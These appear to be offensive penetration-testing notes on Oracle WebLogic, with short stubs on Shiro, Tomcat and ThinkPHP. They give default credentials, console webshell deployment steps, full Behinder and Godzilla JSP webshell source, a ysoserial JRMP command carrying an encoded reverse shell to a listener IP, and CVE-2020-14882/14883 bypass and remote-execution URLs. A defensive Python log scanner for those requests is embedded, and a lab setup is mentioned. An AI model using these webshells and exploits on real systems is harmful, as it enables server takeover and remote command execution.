Weblogic
CMS:
Default port: 7001. Admin console: http://ip:port/console
Default user/pass: weblogic / Oracle@123
Common default passwords: Default Passwords | CIRT.net
Get into the console with a weak password or by brute force.
1. Getting a shell from the console
http://url:7001/console -> Domain Structure -> Deployments -> Install -> Upload your file(s) -> browse to a JSP webshell packed as a zip archive and renamed to .war (shell.jsp -> right-click, add to shell.zip -> rename to shell.war) -> upload -> keep clicking Next until Finish appears -> click Finish -> visit http://url:7001/shell/shell.jsp -> connect with Behinder (冰蝎)
// Behinder (冰蝎) JSP webshell, connection password: rebeyond
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%>
<%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%>
<%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/* this key is the first 16 characters of the 32-character MD5 of the connection password; default password is rebeyond */session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
2. CVE-2020-2551
Environment:
cd vulhub/weblogic/weak_password
docker-compose up -d
3. CVE-2017-3248 (JRMP)
java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 8000 CommonsCollections1 "bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTcyLjE4LjAuMTgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}"
4. getshell
sh: find / -name index.html. The IP is the listening machine's IP, JRMP is the port the listener was started on, and port 8000 is the 8000 port from the step above (the JRMPListener command). The URL is the real path of the vulnerable WebLogic site's index.html (take the longest match found by find, which is usually the site's real index.html); in that directory write the Godzilla (哥斯拉) one-liner webshell.
echo '<%! String xc="3c6e0b8a9c15224a"; String pass="pass"; String md5=md5(pass+xc); class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }public byte[] x(byte[] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"));return c.doFinal(s); }catch (Exception e){return null; }} public static String md5(String s) {String ret = null;try {java.security.MessageDigest m;m = java.security.MessageDigest.getInstance("MD5");m.update(s.getBytes(), 0, s.length());ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();} catch (Exception e) {}return ret; } public static String base64Encode(byte[] bs) throws Exception {Class base64;String value = null;try {base64=Class.forName("java.util.Base64");Object Encoder = base64.getMethod("getEncoder", null).invoke(base64, null);value = (String)Encoder.getClass().getMethod("encodeToString", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Encoder"); Object Encoder = base64.newInstance(); value = (String)Encoder.getClass().getMethod("encode", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e2) {}}return value; } public static byte[] base64Decode(String bs) throws Exception {Class base64;byte[] value = null;try {base64=Class.forName("java.util.Base64");Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Decoder"); Object decoder = base64.newInstance(); value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e2) {}}return value; 
}%><%try{byte[] data=base64Decode(request.getParameter(pass));data=x(data, false);if (session.getAttribute("payload")==null){session.setAttribute("payload",new X(this.getClass().getClassLoader()).Q(data));}else{request.setAttribute("parameters",data);java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();Object f=((Class)session.getAttribute("payload")).newInstance();f.equals(arrOut);f.equals(pageContext);response.getWriter().write(md5.substring(0,16));f.toString();response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true)));response.getWriter().write(md5.substring(16));} }catch (Exception e){}
%>'
4. CVE-2020-14882 && CVE-2020-14883 (unauthenticated access)
Environment setup: cd vulhub/weblogic/cve-2020-14882 -> docker-compose up -d
Unauthenticated access to the console:
http://ip:port/console/css/%252e%252e%252fconsole.portal
Remote command execution (RCE); command output can be echoed back, and a shell is obtained with the same steps as above.
http://ip:port/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27cmd%27);%22)
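A defender-side check for the two requests above, added here as an example and not part of the original notes: it double-decodes request paths from constructed access-log lines (the log lines and IPs are made up) and flags the traversal to console.portal (CVE-2020-14882) and the ShellSession handle (CVE-2020-14883).

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format); not from any real host.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2021:10:00:00 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 1532
10.0.0.7 - - [01/Jan/2021:10:00:01 +0000] "GET /console/css/%252e%252e%252fconsole.portal HTTP/1.1" 200 4120
10.0.0.7 - - [01/Jan/2021:10:00:02 +0000] "GET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27cmd%27);%22) HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2021:10:00:03 +0000] "GET /console/console.portal?_nfpb=true&_pageLabel=HomePage1 HTTP/1.1" 200 9000
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')

def classify(raw_path: str) -> list[str]:
    """Return the CVE-2020-14882/14883 indicators found in one request path.
    The path is decoded twice because the bypass relies on double URL encoding,
    so %252e%252e%252f and %2e%2e%2f variants both normalise to '../'."""
    decoded = unquote(unquote(raw_path)).lower()
    findings = []
    if "/console/" in decoded and "../" in decoded and "console.portal" in decoded:
        findings.append("CVE-2020-14882 console auth bypass (traversal to console.portal)")
    if "handle=" in decoded and "shellsession" in decoded:
        findings.append("CVE-2020-14883 ShellSession handle (RCE attempt)")
    return findings

def scan_log(text: str) -> list[tuple[str, list[str]]]:
    """Return (client_ip, findings) for every log line that carries an indicator.
    A plain authenticated console.portal request (last sample line) is not flagged."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        findings = classify(m.group("path"))
        if findings:
            hits.append((line.split()[0], findings))
    return hits

if __name__ == "__main__":
    for ip, findings in scan_log(SAMPLE_LOG):
        print(ip, "->", "; ".join(findings))
```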
5. Unauthenticated access + CVE-2021-2109
Shiro
CMS identification:
Shiro sets rememberMe=deleteMe in the response to a login request.
Vulnerability identification:
1. Shiro550 CVE-2016-4437
Affected versions: Apache Shiro <= 1.2.4
2. Shiro721
Affected versions: 1.2.5, 1.2.6, 1.3.0, 1.3.1, 1.3.2, 1.4.0-RC2, 1.4.0, 1.4.1
Get the Set-Cookie values after logging in:
Guess the key:
Tomcat
CMS: default port 8080
Thinkphp
CMS:
ThinkPHP can be identified by requesting a path that does not exist; the resulting error page reveals the ThinkPHP framework.